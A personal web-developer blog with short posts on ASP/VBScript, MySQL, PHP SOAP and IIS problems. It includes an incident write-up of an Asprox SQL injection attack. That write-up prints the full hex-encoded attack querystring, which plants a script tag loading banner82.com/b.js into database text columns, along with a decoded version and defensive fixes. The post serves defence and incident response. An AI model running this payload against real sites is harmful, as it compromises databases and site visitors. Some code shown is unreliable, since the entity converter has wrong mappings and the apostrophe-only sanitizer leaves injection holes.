Skip to content

Categories:

Looking to hire for for mysql / iis asp troubleshooting

Hello,

I’m looking to hire someone to fix these errors on our servers.
090315 13:47:27 [Warning] Aborted connection 10269 to db: user: ‘abc’ host: ‘server.de’ (Got an error reading communication packets)

At the same time, the asp scripts on IIS6 give a connection error when trying to connect to the mysql server.

The error appears when going from an Windows 2003 IIS6 Server using
MySQL Connector/ODBC 5.1.5
to connect to a mysql box running Gentoo Linux mysql-5.0.44-r2

The errors appear sporadicallly and I’m looking for someone that has the skills on both linux and windows platforms to trace the error and help solve it.

Any takers?
Please respond.

Posted in misc.

Tagged with .


vbscript to convert html into numeric entities for xml file (rss feed)

After numerous failures getting through the http://feedvalidator.org because of some remnants left by word or other text editors, I implented the replacement function found at http://www.texaswebdevelopers.com/examples/sql-injection-protection.asp.

For the german text we work on it was changed slightly to include german umlaute.
Here’s the function:

FUNCTION htmlEntities(strString)
Dim strOutput
strOutput = strString

strOutput = replace(strOutput,Chr(10),””)
strOutput = replace(strOutput,Chr(13),””)
strOutput = replace(strOutput,”&”,”&”)
strOutput = replace(strOutput,”‘”,”'”)
strOutput = replace(strOutput,”§”,”§”)
strOutput = replace(strOutput,”©”,”©”)
strOutput = replace(strOutput,”®”,”®”)
strOutput = replace(strOutput,”¦”,”¦”)
strOutput = replace(strOutput,”‘”,”"”)
strOutput = replace(strOutput,”<“,”&#60;”)
strOutput = replace(strOutput,”>”,”&#62;”)
strOutput = replace(strOutput,”–”,”&#8211;”)
strOutput = replace(strOutput,”—”,”&#62;”)
strOutput = replace(strOutput,”‘”,”&#8216;”)
strOutput = replace(strOutput,”’”,”&#8217;”)
strOutput = replace(strOutput,”“”,”&#8220;”)
strOutput = replace(strOutput,”””,”&#8221;”)
strOutput = replace(strOutput,”„”,”&#8222;”)
strOutput = replace(strOutput,”†”,”&#8224;”)
strOutput = replace(strOutput,”‡”,”&#8216;”)
strOutput = replace(strOutput,”…”,”&#8230;”)
strOutput = replace(strOutput,”¡”,”&#161;”)
strOutput = replace(strOutput,”¤”,”&#164;”)
strOutput = replace(strOutput,”¢”,”&#162;”)
strOutput = replace(strOutput,”£”,”&#163;”)
strOutput = replace(strOutput,”¥”,”&#165;”)
strOutput = replace(strOutput,”¦”,”&#166;”)
strOutput = replace(strOutput,”§”,”&#167;”)
strOutput = replace(strOutput,”¨”,”&#168;”)
strOutput = replace(strOutput,”©”,”&#169;”)
strOutput = replace(strOutput,”ª”,”&#170;”)
strOutput = replace(strOutput,”«”,”&#171;”)
strOutput = replace(strOutput,”¬”,”&#172;”)
strOutput = replace(strOutput,”®”,”&#174;”)
strOutput = replace(strOutput,”™”,”&#8482;”)
strOutput = replace(strOutput,”¯”,”&#175;”)
strOutput = replace(strOutput,”°”,”&#176;”)
strOutput = replace(strOutput,”±”,”&#177;”)
strOutput = replace(strOutput,”²”,”&#178;”)
strOutput = replace(strOutput,”³”,”&#179;”)
strOutput = replace(strOutput,”´”,”&#180;”)
strOutput = replace(strOutput,”µ”,”&#181;”)
strOutput = replace(strOutput,”¶”,”&#182;”)
strOutput = replace(strOutput,”·”,”&#183;”)
strOutput = replace(strOutput,”¸”,”&#184;”)
strOutput = replace(strOutput,”¹”,”&#185;”)
strOutput = replace(strOutput,”º”,”&#186;”)
strOutput = replace(strOutput,”»”,”&#187;”)
strOutput = replace(strOutput,”¼”,”&#188;”)
strOutput = replace(strOutput,”½”,”&#189;”)
strOutput = replace(strOutput,”¾”,”&#190;”)
strOutput = replace(strOutput,”¿”,”&#191;”)
strOutput = replace(strOutput,”×”,”&#215;”)
strOutput = replace(strOutput,”÷”,”&#247;”)
strOutput = replace(strOutput,”‰”,”&#8240;”)
strOutput = replace(strOutput,”‹”,”&#8249;”)
strOutput = replace(strOutput,”›”,”&#8250;”)
strOutput = replace(strOutput,”€”,”&#8364;”)
strOutput = replace(strOutput,”&quot;”,”&#34;”) 
strOutput = replace(strOutput,”&apos;”,”&#39;”)
strOutput = replace(strOutput,”&amp;”,”&#38;”)
strOutput = replace(strOutput,”&lt;”,”&#60;”)
strOutput = replace(strOutput,”&gt;”,”&#62;”)
strOutput = replace(strOutput,”&nbsp;”,” &#160;”)               
strOutput = replace(strOutput,”&ndash;”,”&#8211;”)
strOutput = replace(strOutput,”&mdash;”,”&#8212;”)
strOutput = replace(strOutput,”&lsquo;”,”&#8216;”)
strOutput = replace(strOutput,”&rsquo;”,”&#8217;”)
strOutput = replace(strOutput,”&sbquo;”,”&#8218;”)
strOutput = replace(strOutput,”&ldquo;”,”&#8220;”)
strOutput = replace(strOutput,”&rdquo;”,”&#8221;”)
strOutput = replace(strOutput,”&bdquo;”,”&#8222;”)
strOutput = replace(strOutput,”&dagger;”,”&#8224;”)
strOutput = replace(strOutput,”&Dagger;”,”&#8225;”)
strOutput = replace(strOutput,”&hellip;”,”&#8230;”)
strOutput = replace(strOutput,”&iexcl;”,”&#161;”)
strOutput = replace(strOutput,”&curren;”,”&#164;”)
strOutput = replace(strOutput,”&cent;”,”&#162;”)
strOutput = replace(strOutput,”&pound;”,”&#163;”)
strOutput = replace(strOutput,”&yen;”,”&#165;”)
strOutput = replace(strOutput,”&brvbar;”,”&#166;”)
strOutput = replace(strOutput,”&sect;”,”&#167;”)
strOutput = replace(strOutput,”&uml;”,”&#168;”)
strOutput = replace(strOutput,”&copy;”,”&#169;”)
strOutput = replace(strOutput,”&ordf;”,”&#170;”)
strOutput = replace(strOutput,”&laquo;”,”&#171;”)
strOutput = replace(strOutput,”&not;”,”&#172;”)
strOutput = replace(strOutput,”&shy;”,”&#173;”)
strOutput = replace(strOutput,”&reg;”,”&#174;”)
strOutput = replace(strOutput,”&trade;”,”&#8482;”)
strOutput = replace(strOutput,”&macr;”,”&#175;”)
strOutput = replace(strOutput,”&deg;”,”&#176;”)
strOutput = replace(strOutput,”&plusmn;”,”&#177;”)
strOutput = replace(strOutput,”&sup2;”,”&#178;”)
strOutput = replace(strOutput,”&sup3;”,”&#179;”)
strOutput = replace(strOutput,”&acute;”,”&#180;”)
strOutput = replace(strOutput,”&micro;”,”&#181;”)
strOutput = replace(strOutput,”&para;”,”&#182;”)
strOutput = replace(strOutput,”&middot;”,”&#183;”)
strOutput = replace(strOutput,”&cedil;”,”&#184;”)
strOutput = replace(strOutput,”&sup1;”,”&#185;”)
strOutput = replace(strOutput,”&ordm;”,”&#186;”)
strOutput = replace(strOutput,”&raquo;”,”&#187;”)
strOutput = replace(strOutput,”&frac14;”,”&#188;”)
strOutput = replace(strOutput,”&frac12;”,”&#189;”)
strOutput = replace(strOutput,”&frac34;”,”&#190;”)
strOutput = replace(strOutput,”&iquest;”,”&#191;”)
strOutput = replace(strOutput,”&times;”,”&#215;”)
strOutput = replace(strOutput,”&divide;”,”&#247;”)
strOutput = replace(strOutput,”&Agrave;”,”&#192;”)
strOutput = replace(strOutput,”&Aacute;”,”&#193;”)
strOutput = replace(strOutput,”&Acirc;”,”&#194;”)
strOutput = replace(strOutput,”&Atilde;”,”&#195;”)
strOutput = replace(strOutput,”&Auml;”,”&#196;”)
strOutput = replace(strOutput,”&Aring;”,”&#197;”)
strOutput = replace(strOutput,”&AElig;”,”&#198;”)
strOutput = replace(strOutput,”&Ccedil;”,”&#199;”)
strOutput = replace(strOutput,”&Egrave;”,”&#200;”)
strOutput = replace(strOutput,”&Eacute;”,”&#201;”)
strOutput = replace(strOutput,”&Ecirc;”,”&#202;”)
strOutput = replace(strOutput,”&Euml;”,”&#203;”)
strOutput = replace(strOutput,”&Igrave;”,”&#204;”)
strOutput = replace(strOutput,”&Iacute;”,”&#205;”)
strOutput = replace(strOutput,”&Icirc;”,”&#206;”)
strOutput = replace(strOutput,”&Iuml;”,”&#207;”)
strOutput = replace(strOutput,”&ETH;”,”&#208;”)
strOutput = replace(strOutput,”&Ntilde;”,”&#209;”)
strOutput = replace(strOutput,”&Ograve;”,”&#210;”)
strOutput = replace(strOutput,”&Oacute;”,”&#211;”)
strOutput = replace(strOutput,”&Ocirc;”,”&#212;”)
strOutput = replace(strOutput,”&Otilde;”,”&#213;”)
strOutput = replace(strOutput,”&Ouml;”,”&#214;”)
strOutput = replace(strOutput,”&Oslash;”,”&#216;”)
strOutput = replace(strOutput,”&Ugrave;”,”&#217;”)
strOutput = replace(strOutput,”&Uacute;”,”&#218;”)
strOutput = replace(strOutput,”&Ucirc;”,”&#219;”)
strOutput = replace(strOutput,”&Uuml;”,”&#220;”)
strOutput = replace(strOutput,”&Yacute;”,”&#221;”)
strOutput = replace(strOutput,”&THORN;”,”&#222;”)
strOutput = replace(strOutput,”&szlig;”,”&#223;”)
strOutput = replace(strOutput,”&agrave;”,”&#224;”)
strOutput = replace(strOutput,”&aacute;”,”&#225;”)
strOutput = replace(strOutput,”&acirc;”,”&#226;”)
strOutput = replace(strOutput,”&atilde;”,”&#227;”)
strOutput = replace(strOutput,”&auml;”,”&#228;”)
strOutput = replace(strOutput,”&aring;”,”&#229;”)
strOutput = replace(strOutput,”&aelig;”,”&#230;”)
strOutput = replace(strOutput,”&ccedil;”,”&#231;”)
strOutput = replace(strOutput,”&egrave;”,”&#232;”)
strOutput = replace(strOutput,”&eacute;”,”&#233;”)
strOutput = replace(strOutput,”&ecirc;”,”&#234;”)
strOutput = replace(strOutput,”&euml;”,”&#235;”)
strOutput = replace(strOutput,”&igrave;”,”&#236;”)
strOutput = replace(strOutput,”&iacute;”,”&#237;”)
strOutput = replace(strOutput,”&icirc;”,”&#238;”)
strOutput = replace(strOutput,”&iuml;”,”&#239;”)
strOutput = replace(strOutput,”&eth;”,”&#240;”)
strOutput = replace(strOutput,”&ntilde;”,”&#241;”)
strOutput = replace(strOutput,”&ograve;”,”&#242;”)
strOutput = replace(strOutput,”&oacute;”,”&#243;”)
strOutput = replace(strOutput,”&ocirc;”,”&#244;”)
strOutput = replace(strOutput,”&otilde;”,”&#245;”)
strOutput = replace(strOutput,”&ouml;”,”&#246;”)
strOutput = replace(strOutput,”&oslash;”,”&#248;”)
strOutput = replace(strOutput,”&ugrave;”,”&#249;”)
strOutput = replace(strOutput,”&uacute;”,”&#250;”)
strOutput = replace(strOutput,”&ucirc;”,”&#251;”)
strOutput = replace(strOutput,”&uuml;”,”&#252;”)
strOutput = replace(strOutput,”&yacute;”,”&#253;”)
strOutput = replace(strOutput,”&thorn;”,”&#254;”)
strOutput = replace(strOutput,”&yuml;”,”&#255;”)
strOutput = replace(strOutput,”&OElig;”,”&#338;”)
strOutput = replace(strOutput,”&oelig;”,”&#339;”)
strOutput = replace(strOutput,”&Scaron;”,”&#352;”)
strOutput = replace(strOutput,”&scaron;”,”&#353;”)
strOutput = replace(strOutput,”&Yuml;”,”&#376;”)
strOutput = replace(strOutput,”&circ;”,”&#710;”)
strOutput = replace(strOutput,”&tilde;”,”&#732;”)
strOutput = replace(strOutput,”&ensp;”,”&#8194;”)
strOutput = replace(strOutput,”&emsp;”,”&#8195;”)
strOutput = replace(strOutput,”&thinsp;”,”&#8201;”)
strOutput = replace(strOutput,”&zwnj;”,”&#8204;”)
strOutput = replace(strOutput,”&zwj;”,”&#8205;”)
strOutput = replace(strOutput,”&lrm;”,”&#8206;”)
strOutput = replace(strOutput,”&rlm;”,”&#8207;”)
strOutput = replace(strOutput,”&permil;”,”&#8240;”)
strOutput = replace(strOutput,”&lsaquo;”,”&#8249;”)
strOutput = replace(strOutput,”&rsaquo;”,”&#8250;”)
strOutput = replace(strOutput,”&euro;”,”&#8364;”)
    strOutput = Replace(strOutput, “ä”, “&#228;”)
    strOutput = Replace(strOutput, “Ä”, “&#196;”)
    strOutput = Replace(strOutput, “ö”, “&#246;”)
    strOutput = Replace(strOutput, “Ö”, “&#214;”)
    strOutput = Replace(strOutput, “ü”, “&#252;”)
    strOutput = Replace(strOutput, “Ü”, “&#220;”)
    strOutput = Replace(strOutput, “ß”, “&#223;”)

    htmlEntities = strOutput
END FUNCTION

Posted in misc.


Apostrophe in eval() on asp vbscript

Eval() stops executing when it hits an apostrophe in the evaluated expression sought.
Had to find this out the hard way after some messages were truncated by this bug.
Some further explanation:
http://bytes.com/topic/javascript/answers/712903-eval-apostrophe

I used this opportunity to replace all the eval calls in that particular function with the actual variable names.
Don’t be eval!

Posted in misc.


ipayment addresscheck

Today we had some trouble with the automatic address check provided by our payment provider ipayment.

For some reason, german street names were no longer accepted if they contained special german characters such as ß or ö,ä,ü. We countered by replacing them with their “manual” counterparts ss, oe, ae, ue. 

The problem seems to have disappeared a few hours later but my email to ipayment has been unanswered so far.

Posted in code.

Tagged with .


new canonical tag by google, yahoo, etc..

After reading up on the new canonical tag by google I immediately looked at implementing it on our home-grown cms. It turns out that we’re already 301ing where we can, and the canonical tag would have little relevance at first glance. 

http://www.mattcutts.com/blog/canonical-link-tag/

However, we use our own session management and sometimes a url like verynice.html gets turned into notsonice.asp?id=verynice when certain session functions kick in.

A quick hack into our header and now we use the canonical tag in order to tell google and yahoo about our content. As I’ve seen thousands of duplicate content issues in google webmaster tools, I hope this will have some effect.

Posted in code.

Tagged with , .


strip html tags in vbscript

Function stripHTMLtags(HTMLstring)

Set RegularExpressionObject = New RegExp

With RegularExpressionObject
.Pattern = “<[^>]+>”
.IgnoreCase = True
.Global = True
End With

stripHTMLtags = RegularExpressionObject.Replace(HTMLstring, “”)
Set RegularExpressionObject = nothing

End Function

Posted in code.

Tagged with , , .


blogspot deleted my blog. Sniff.

And then it was gone. After a healthy breakfast and a cortado I was faced with this when visiting my blog. It had been deleted by the good folks at google. No email, no message saying “Sorry”. Just gone.

It seems I’m not the only facing such difficulties (as a search for deleted blogspot blogs will show), but it seems that google sometimes does it to their own blogs (http://www.searchenginejournal.com/google-blog-accidentally-deleted-by-google/3186/)

What really irked me though was that they did not even send an email to the owner of the blog. Is this the right way to treat bloggers? Even more frustrating is the attempt to contact google for help. Their “help” pages on blogspot are a hellish circle of multiple choice questions that led me to read the postings of other helpless users on the blogpost help group.

The only choice I had was to host this blog myself. So here we go, a new site, a new url. Thanks google.

Posted in misc.

Tagged with , , , .


consuming a .net web service with php problem

The trouble I had with consuming a .Net Web service with a php script was that the parameters I passed were not “seen” by the .Net Application.
I used the php_soap.dll (php5 running on windows) with the simple call:

$testRequest = $client->IsAliveNachnameEmail(“Smith”,”smith@smith.com”);

However, the .Net Soap Service did not receive the parameters Smith and smith@smith.com

Do not pass in the parameters directly, but use the following method:

$strNachname = “smith”;
$strEmail = “smith@smith.com”;
$params = array(‘Nachname’=>$strNachname, ‘Email’=>$strEmail);
$testRequest = $client->IsAliveNachnameEmail($params);
echo $test2Request->IsAliveNachnameEmailResult;

and it works! Voila.

Posted in code.

Tagged with , , , .


iis using cifs share (unc) really slow! here’s the solution.

I just spent the whole weekend waging war with my IIS box (2003 server). After switching the files from a local drive to a netapp share (cifs), the speed of my site slowed to a crawl.
The pages would still appear – but the pace was incredibly slow.
What’s more, the ISAPI REWRITE extension was no longer working, even though the httpd.ini file was in the web root – as it had been before, but for some reason the rewrite extension could not see the file.

So, I hoped that my usual strategy would yield the solution to the problem. The right combination of keywords usually finds a forum entry with the same problem and a corresponding solution. This time however, no such luck. A good hint did come from the helicon tech forum (the makers of ISAPI rewrite).

The solution was to change the application pool identity (user).
The network service user – the default for an application pool – did not have proper access to the share (although it did have some access – probably after x timeouts). The new user (specifically created for the cifs share) solved the problem and IIS is humming again. I had to add some group memberships to this user to make it work.
Hope this helps someone in the same situation.

Posted in code.

Tagged with , , , , , .


Fast-flux botnet! Asprox! SQL Injection! oh no!

No, it’s not from “back to the future”. But it might make you rip your hair out and you’ll end up looking like the Doc.

Here’s an introduction of what they are: http://blogs.zdnet.com/security/?p=1122
and some evidence of people scrambling on how to protect their servers: http://www.experts-exchange.com/Security/Vulnerabilities/Q_23408074.html

This morning I got a frantic call from headoffice telling me that we’ve been hacked and that the database is filled with Javascript strings pointing to www.banner82.com/b.js. Both banner82.com and banner82.org are referenced in the scripts.

Here’s the querystring that was (and is still) being tried against all variables of our application:

DECLARE%20@S%20 VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832 3535292C40432056415243484152283235352920444 5434C415245205461626C655F437572736F72204355 52534F5220464F522053454C45435420612E6E616D6 52C622E6E616D652046524F4D207379736F626A6563 747320612C737973636F6C756D6E732062205748455 24520612E69643D622E696420414E4420612E787479 70653D27752720414E442028622E78747970653D393 9204F5220622E78747970653D3335204F5220622E78 747970653D323331204F5220622E78747970653D313 63729204F50454E205461626C655F437572736F7220 4645544348204E4558542046524F4D205461626C655 F437572736F7220494E544F2040542C404320574849 4C4528404046455443485F5354415455533D3029204 24547494E20455845432827555044415445205B272B4 0542B275D20534554205B272B40432B275D3D525452 494D28434F4E5645525428564152434841522834303 030292C5B272B40432B275D29292B27273C736372697 074207372633D687474703A2F2F7777772E62616E6E 657238322E636F6D2F622E6A733E3C2F736372697074 3E27272729204645544348204E4558542046524F4D205461626C
655F437572736F7220494E544F2040542C404320454E 4420434C4F5345205461626C655F437572736F722044 45414C4C4F43415445205461626C655F437572736F722

0%20AS%20VARCHAR(4000));EXEC(@S);--

which translates to the following sql statements:

DECLARE
@T VARCHAR(255),
@C VARCHAR(255)
DECLARE
Table_Cursor
CURSOR FOR
SELECT
a.name,b.name
FROM
sysobjects a,syscolumns b
WHERE
a.id=b.id AND
a.xtype='u' AND
(b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN
Table_Cursor
FETCH NEXT FROM
Table_Cursor
INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''''')
FETCH NEXT FROM Table_Cursor
INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
(courtesy of http://pastebin.com/d73dda647)

So we got hit. Here’s what we did and what you can do to protect your servers.

Step 1. Take down the site.
Step 2. Clean the database
Step 3. Patch the .asp pages to look for possible injection attacks.
Step 4. Bring the site back up and monitor it.

Here are some tips:
1. Taking down the site is quickly done in IIS, but it’s worthwhile to redirect to a page that tells users that you’ll be back up shortly.
2. To clean the database I used 2 stored procedures. The reason that there are 2 is that SQL Server 2000 needs some extra tweaking when it comes to ntext fields.
2a. The first stored procedure was taken from this site: http://vyaskn.tripod.com/sql_server_search_and_replace.htm.
I had to customize the stored prcedure a bit, but Vyas has written a great stored procedure that gets us halfway there.2b. Now we just have ntext fields left that contain the javascript tags. Ntext fields are more difficult to work with, as you can’t use the replace function. Instead, we use the Updatetext function.
To do this, I customized the stored procedure found on http://sqlserver2000.databases.aspfaq.com/how-do-i-handle-replace-within-an-ntext-column-in-sql-server.html
at aspfaq.com
This stored procedure will replace one string with another in ntext fields. Even though this wasn’t strictly necessary (as you can see above, the ntext fields were cut down to 4000 character fields in the attack), I decided to find out how to replace strings in ntext fields.3. Patching the pages: To do so, you can either parameterize all your query variables into stored procedures (or cmd objects), or you can write your own asp function to strip all inputs before they are sent to the database in dynamic queries.
We chose to go the route of writing our own asp function.

You can use something as simple as:

FUNCTION ChkString(string)
IF string = “” THEN
string = ” ”
END IF
ChkString = Replace(string, “‘”, “””)
END FUNCTION

which will only make sure that all apostrophes are escaped. To make a more advanced function, you can add the Server.HTMLEncode function, and any regular expressions or replacing functions to filter out any offending characters. Just search for XSS vulnerability to get more information on this.

Of importance here is to make sure that all numeric values that go to the database are first enclosed in the CLNG conversion function. This will throw an error anytime an input contains a non-numeric string instead of the number you’re expecting. You can use this error to monitor how attacks on your site are made by specifying a custom asp error page in IIS.

The custom error page can be called asperror.asp and contain the following:

sub geterror
‘ gather details about the error from the ASPError object
‘ get the last error that occurred!
set objasperror = server.getlasterror
‘ go through the properties and get whatever you need…
With objasperror
code = .aspcode
num = .number
src = .source
cat = .category
file = .file
line = .line
column = .column
desc = .description
adesc = .aspdescription
end With

‘ free ASPError object
set objasperror = nothing

‘sendmail
Sendmail “info@mail.com”, “info@mail.com” “asperror”, “Code: ” & code & VbCrLf & “Num: ” & num & VbCrLf & “src: ” & src & vbCrLf & “cat: ” & cat & VbCrLf & “File: ” & file & VbCrLf & “line: ” & line & VbCrLf & “Column: ” & column & VbCrLf & “Desc: ” & desc & VbCRLf & “ASPDesc: ” & adesc & VbCrLf & “QueryString:” & Request.QueryString() & VbCrLf & Request.Form() & VbCrLf & “Referer: ” & Request.ServerVariables(“HTTP_Referer”) & ” ” & Request.ServerVariables(“REMOTE_ADDR”)

END SUB

This kind of function will keep you up-to-date on how and who is trying to attack your server.

4. Last but not least: Avoid this kind of attack all together. With an ISAPI component like ISAPI Rewrite by Helicon, you state something like:
Rewriterule .*DECLAREs.* http://www.mysite.com/block.asp [I,R]
which will make sure that all these attempts are redirected.

Posted in security.

Tagged with , , .